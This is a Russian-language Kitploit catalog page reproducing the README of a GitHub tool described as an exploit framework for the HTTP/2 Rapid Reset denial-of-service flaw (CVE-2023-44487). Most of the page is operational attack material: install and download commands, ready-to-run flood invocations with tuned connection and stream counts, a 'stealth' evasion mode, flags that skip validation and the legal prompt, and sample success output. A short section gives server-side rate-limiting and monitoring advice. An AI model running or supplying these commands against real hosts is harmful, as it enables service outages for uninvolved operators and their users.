Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — Продвинутый фреймворк для эксплуатации уязвимости CVE-2023-44487 HTTP/2 Rapid Reset. Включает многопоточные конкурентные атаки, адаптивное управление скоростью, скрытый режим со случайными заголовками, метрики в реальном времени и отчёты по оценке рисков. Только для авторизованного тестирования на проникновение. Автор: Sudeepa Wanigarathna | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеRed TeamingСостязательная Атака
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

Репозиторий
141 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Продвинутый фреймворк для эксплуатации уязвимости CVE-2023-44487 HTTP/2 Rapid Reset. Включает многопоточные конкурентные атаки, адаптивное управление скоростью, скрытый режим со случайными заголовками, метрики в реальном времени и отчёты по оценке рисков. Только для авторизованного тестирования на проникновение. Автор: Sudeepa Wanigarathna

Поделиться

Эксплойт CVE-2023-44487 HTTP/2 DoS Rapid Reset

Профессиональное издание v1.0.1 | Автор: Sudeepa Wanigarathna

Python Version License Version CVSS


Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Требования
  • Установка
  • Быстрый старт
  • Руководство по использованию
  • Параметры конфигурации
  • Поддержка Docker
  • Примеры
  • Понимание результатов
  • Рекомендации по безопасности
  • Правовой отказ от ответственности
  • Автор
  • Журнал изменений

  • Обзор

    Профессиональная платформа для оценки CVE-2023-44487 — уязвимости HTTP/2 Rapid Reset. Этот инструмент помогает специалистам по безопасности тестировать и проверять системы на устойчивость к одному из самых значительных DoS-состояний HTTP/2, раскрытых за последние годы.

    Он демонстрирует, как быстрое создание и сброс потоков HTTP/2 может истощить ресурсы сервера и привести к состоянию отказа в обслуживании (Denial of Service, DoS).

    Ключевые возможности

    • Многоподключенный механизм атак — Параллельные HTTP/2-соединения
    • Адаптивное управление скоростью — Динамическая настройка для максимальной эффективности
    • Скрытый режим — Случайные заголовки и ротация соединений
    • Подробные отчёты — JSON/CSV с оценкой рисков
    • Поддержка Docker — Развёртывание в контейнерах
    • Мониторинг в реальном времени — Оперативные метрики атаки и прогресс
    • Профессиональное журналирование — Цветной вывод в консоль с записью в файл
    ИспользованиеРезультаты

    Детали уязвимости

    CVE-2023-44487: атака HTTP/2 Rapid Reset

    АтрибутЗначение
    Идентификатор CVECVE-2023-44487
    Оценка CVSS7.5 (высокая)
    Вектор атакиСеть
    Сложность атакиНизкая
    ВоздействиеОтказ в обслуживании (истощение ресурсов)
    Затронутые протоколыHTTP/2
    Дата раскрытияОктябрь 2023 года

    Технический обзор

    Уязвимость эксплуатирует механизм управления потоками протокола HTTP/2:

    1. Создание потока — клиент отправляет кадр HEADERS для создания нового потока
    2. Немедленный сброс — клиент сразу же отправляет кадр RST_STREAM
    3. Обработка сервером — сервер должен обработать оба кадра, расходуя ресурсы
    4. Истощение ресурсов — повторяющиеся циклы перегружают ресурсы сервера

    Воздействие

    • Истощение ресурсов HTTP/2-серверов
    • Возможный отказ в обслуживании (DoS)
    • Может затрагивать балансировщики нагрузки, прокси и CDN
    • Не требует аутентификации или особых привилегий

    Возможности

    Основные возможности

    ВозможностьОписание
    Поддержка HTTP/2Полная реализация протокола HTTP/2 с использованием библиотеки h2
    МногоподключенностьПараллельная атака по нескольким соединениям
    SSL/TLSПоддержка HTTPS с опциями проверки сертификатов
    Адаптивное управление скоростьюДинамически регулирует скорость атаки в зависимости от реакции сервера
    Скрытый режимСлучайные заголовки и ротация соединений
    Мониторинг в реальном времениОтображение оперативных метрик во время выполнения
    Подробные отчётыВывод в формате JSON/CSV с оценкой рисков
    Поддержка DockerРазвёртывание в контейнерах для удобного тестирования

    Расширенные возможности

    • Поддержка прокси — Расширяемая конфигурация прокси
    • Пул соединений — Эффективное управление соединениями
    • Восстановление после ошибок — Корректная обработка сбоев соединений
    • Настройка производительности — Настраиваемые параметры для разных сценариев
    • Интеграция с CI/CD — Подходит для автоматизированного тестирования безопасности

    Требования

    Системные требования

    КомпонентМинимумРекомендуется
    ОСLinux / macOS / WindowsLinux или macOS
    Python3.7+3.11+
    CPU2 ядра4+ ядер
    RAM2 ГБ4 ГБ+
    Сеть100 Мбит/с1 Гбит/с+

    Зависимости

    root@kitploit:~
    h2>=4.1.0,<5.0.0
    aiohttp>=3.8.0,<4.0.0
    

    Установка

    1. Быстрая установка

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    
    # Install dependencies
    pip install -r requirements.txt
    
    # Verify installation
    python3 cve-2023-44487-exploit.py --help
    

    2. Виртуальное окружение (рекомендуется)

    root@kitploit:~
    # Create virtual environment
    python3 -m venv venv
    
    # Activate virtual environment
    # On Linux/macOS:
    source venv/bin/activate
    # On Windows:
    venv\Scripts\activate
    
    # Install dependencies
    pip install -r requirements.txt
    

    3. Установка через Docker

    root@kitploit:~
    # Build Docker image
    docker build -t cve-2023-44487-exploit .
    
    # Run with Docker
    docker run --rm cve-2023-44487-exploit target.com
    

    4. Ручная установка

    root@kitploit:~
    # Install without requirements.txt
    pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
    
    # Download the exploit
    wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
    
    # Make executable
    chmod +x cve-2023-44487-exploit.py
    

    Быстрый старт

    Базовое использование

    root@kitploit:~
    # Simple run with default settings
    python3 cve-2023-44487-exploit.py example.com
    
    # Test HTTPS on port 443
    python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
    
    # Test HTTP on port 80
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    

    Быстрый тест (5 секунд)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    Полная оценка (60 секунд)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
    

    Руководство по использованию

    Параметры командной строки

    Конфигурация цели

    ПараметрОписаниеПо умолчанию
    hostИмя хоста или IP-адрес целиОбязательно
    -p, --portПорт цели443
    --no-sslОтключить SSL/TLSFalse
    --no-verifyПропустить проверку SSLFalse

    Конфигурация атаки

    ПараметрОписаниеПо умолчанию
    -c, --connectionsКоличество параллельных соединений50
    -s, --streamsПотоков на соединение1000
    -d, --durationПродолжительность в секундах30
    --max-streamsМаксимальное общее количество потоков100000
    --delayБазовая задержка между операциями0.0001s

    Расширенные параметры

    ПараметрОписаниеПо умолчанию
    --adaptiveАдаптивное управление скоростьюTrue
    --target-rpsЦелевое количество запросов в секунду10000
    --stealthСкрытый режим (случайные заголовки)False
    --skip-validationПропустить проверку целиFalse
    --forceПропустить запрос правового отказаFalse

    Отчётность

    ПараметрОписаниеПо умолчанию
    -o, --outputИмя выходного файлаexploit_results.json
    --formatФормат вывода (json / csv / console)json
    -v, --verboseПодробное журналированиеFalse

    Параметры конфигурации

    Используйте указанные выше флаги CLI для настройки параллелизма, объёма потоков, длительности и отчётности. Для первоначальной проверки предпочитайте меньшие значения -c / -s / -d, а масштабирование выполняйте только на системах, которые вам разрешено подвергать нагрузочному тестированию.

    СценарийРекомендуемые флаги
    Дымовой тест-c 10 -s 100 -d 5
    Стандартная оценка-c 50 -s 1000 -d 30
    Лабораторный тест с высокой нагрузкой-c 100 -s 2000 -d 60 --stealth
    Недоверенный сертификат--no-verify
    Обычный HTTP-p 80 --no-ssl

    Поддержка Docker

    Сборка образа

    root@kitploit:~
    docker build -t cve-2023-44487-exploit .
    

    Запуск базовой оценки

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com
    

    Запуск с пользовательскими параметрами

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
    

    Сохранение результатов локально

    root@kitploit:~
    docker run --rm -v "$(pwd)/results:/app/results" \
      cve-2023-44487-exploit target.com -o /app/results/report.json
    

    Интерактивный режим

    root@kitploit:~
    docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
    

    Docker Compose

    root@kitploit:~
    # Start with docker-compose
    docker-compose up
    
    # Run with a custom command
    docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
    

    Примеры

    1. Базовая оценка HTTPS

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
    

    2. Оценка HTTP (без SSL)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
    

    3. Высокопроизводительный лабораторный запуск

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
    

    4. Скрытый режим

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
    

    5. Быстрый проверочный тест

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    6. Формирование отчёта CSV

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
    

    7. Пропуск проверки

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
    

    8. Авторизованный тест на production-системе

    root@kitploit:~
    python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
      -c 100 -s 2000 -d 60 --stealth -o full_report.json
    

    Понимание результатов

    Выходные метрики

    МетрикаОписаниеИнтерпретация
    Всего потоковКоличество созданных потоковЧем выше значение, тем больше создаваемая нагрузка
    Успешные сбросыПотоки, успешно сброшенныеОбычно >90% на уязвимых целях
    Скорость сброса (RPS)Сбросов в секундуЧем выше скорость, тем эффективнее нагрузка
    Процент успехаПроцент успешных сбросов>90% часто указывает на подверженность атаке
    Ошибки соединенийНеудачные соединенияНизкое значение = стабильное соединение
    Сбросы сервераСбросы, инициированные серверомВысокое значение = присутствуют защитные меры

    Уровни оценки риска

    УровеньОценкаЗначение
    КРИТИЧЕСКИЙ80–100Сервер крайне уязвим
    ВЫСОКИЙ60–79Сервер уязвим, частичная защита
    СРЕДНИЙ40–59Имеется частичная защита
    НИЗКИЙ0–39Хорошо защищённый сервер

    Пример вывода

    root@kitploit:~
    ================================================================================
    EXPLOIT EXECUTION SUMMARY
    ================================================================================
    Target: target.com:443
    Duration: 30.00s
    Total Streams: 15,234
    Successful Resets: 15,198
    Reset Rate: 506.6/s
    Success Rate: 99.76%
    Connection Errors: 0
    --------------------------------------------------------------------------------
    RISK ASSESSMENT
    --------------------------------------------------------------------------------
    Risk Level: CRITICAL
    Risk Score: 95/100
    Factors:
      - Extremely high reset rate accepted
      - Very high success rate
    ================================================================================
    

    Рекомендации по безопасности

    Для системных администраторов

    Немедленные действия

    1. Установите исправления безопасности

      • Обновитесь до последних реализаций HTTP/2
      • Установите исправления безопасности от производителей
      • Обновите балансировщики нагрузки и прокси
    2. Внедрите ограничение скорости

      root@kitploit:~
      # Nginx rate limiting example
      http {
          limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
          limit_req zone=http2 burst=20 nodelay;
      }
      
    3. Ограничения соединений

      root@kitploit:~
      # Limit connections per client
      limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
      limit_conn conn_zone 10;
      

    Усиление конфигурации

    ПараметрРекомендация
    Максимальное количество параллельных потоковУстановите 100–200 на соединение
    Скорость сброса потоковОграничьте <100/сек на клиента
    Лимит соединенийМаксимум 50–100 соединений на IP
    Значения тайм-аутовУменьшите тайм-ауты простоя
    Лимиты размера запросовОграничьте размеры заголовков и полезной нагрузки

    Мониторинг

    root@kitploit:~
    # Monitor HTTP/2 connections
    netstat -an | grep 443 | grep ESTABLISHED | wc -l
    
    # Monitor reset-related log entries (example)
    grep "RST_STREAM" /var/log/nginx/error.log | wc -l
    

    Рекомендуемые средства защиты

    • Ограничение скорости — внедрите лимиты потоков на клиента
    • Ограничение соединений — ограничьте соединения с одного IP
    • Лимиты ресурсов — задайте значения тайм-аутов соединений
    • Мониторинг — включите журналирование и оповещения об аномалиях
    • Правила WAF — внедрите правила WAF для HTTP/2
    • Управление обновлениями — регулярные обновления безопасности
    • Реагирование на инциденты — имейте план действий при DoS-атаках

    Правовой отказ от ответственности

    ВАЖНО: ВНИМАТЕЛЬНО ПРОЧТИТЕ ПЕРЕД ИСПОЛЬЗОВАНИЕМ ЭТОГО ИНСТРУМЕНТА

    Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей.

    Условия использования

    Используя этот инструмент, вы подтверждаете и соглашаетесь с тем, что:

    1. У вас есть явное письменное разрешение на тестирование целевой системы
    2. Вы понимаете риски и возможные последствия этой оценки
    3. Вы будете соблюдать все применимые законы и нормативные акты
    4. Вы принимаете на себя полную ответственность за свои действия
    5. Вы не будете использовать этот инструмент для несанкционированной деятельности

    Запрещённое использование

    Этот инструмент НЕЛЬЗЯ использовать для:

    • Несанкционированного тестирования или атак
    • Отказа в обслуживании систем, которыми вы не владеете или на тестирование которых у вас нет разрешения
    • Нарушения работы production-систем без авторизации
    • Причинения финансового ущерба
    • Любой незаконной деятельности

    Заявление об ответственности

    АВТОР И УЧАСТНИКИ ПРЕДОСТАВЛЯЮТ ЭТОТ ИНСТРУМЕНТ «КАК ЕСТЬ» БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. ИСПОЛЬЗОВАНИЕ ЭТОГО ИНСТРУМЕНТА ОСУЩЕСТВЛЯЕТСЯ НА ВАШ СОБСТВЕННЫЙ РИСК. АВТОР НЕ НЕСЁТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЙ УЩЕРБ ИЛИ ПРАВОВЫЕ ПРОБЛЕМЫ, ВОЗНИКШИЕ В РЕЗУЛЬТАТЕ ИСПОЛЬЗОВАНИЯ ЭТОГО ИНСТРУМЕНТА.

    Несанкционированное использование этого инструмента может нарушать законы, включая, но не ограничиваясь:

    • Computer Fraud and Abuse Act (CFAA) — США
    • Computer Misuse Act — Великобритания
    • General Data Protection Regulation (GDPR) — ЕС
    • Другие применимые местные, национальные и международные законы

    Автор

    Sudeepa Wanigarathna

    • Исследователь безопасности и специалист по тестированию на проникновение
    • Специализация: безопасность приложений и уязвимости протоколов
    • GitHub
    • LinkedIn

    Журнал изменений

    Версия 1.0.1 (текущая)

    • Исправлена ошибка атрибута connection_attempts
    • Улучшена проверка SSL/ALPN
    • Добавлена обработка тайм-аутов
    • Улучшено восстановление после ошибок
    • Добавлен флаг --skip-validation
    • Улучшена поддержка Docker

    Версия 1.0.0 (начальная)

    • Первоначальный выпуск профессионального издания
    • Многоподключенный механизм атак
    • Адаптивное управление скоростью
    • Скрытый режим
    • Подробная отчётность
    • Поддержка Docker

    Лицензия

    Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.


    Благодарности

    • Команда протокола HTTP/2
    • Исследователи безопасности, выявившие CVE-2023-44487
    • Сообщество открытого кода (проекты h2, aiohttp)

    Ссылки

    • Запись CVE-2023-44487 в NVD
    • Анализ атаки HTTP/2 Rapid Reset
    • Спецификация протокола HTTP/2 (RFC 9113)
    • Бюллетень безопасности Nginx по HTTP/2
    • Руководство по безопасности HTTP/2 для Apache

    Поддержка

    По вопросам и проблемам:

    • GitHub Issues: Создать обращение
    • Email: [email protected]
    • Контакт по безопасности: Если вы обнаружили уязвимость в этом проекте, пожалуйста, сообщите о ней ответственно.

    Краткая справочная карточка

    root@kitploit:~
    # Quick Commands
    
    # Test HTTPS (skip cert verify)
    python3 cve-2023-44487-exploit.py target.com --no-verify
    
    # Test HTTP
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    
    # Quick test (5 seconds)
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
    
    # Full assessment
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
    
    # Skip validation
    python3 cve-2023-44487-exploit.py target.com --skip-validation
    
    # Docker
    docker run --rm cve-2023-44487-exploit target.com
    
    # Help
    python3 cve-2023-44487-exploit.py --help
    

    НАПОМИНАНИЕ: Всегда получайте надлежащее разрешение перед тестированием любой системы. Используйте этот инструмент ответственно и этично.


    Поддерживается Sudeepa Wanigarathna | Последнее обновление: август 2026

    Скачать инструмент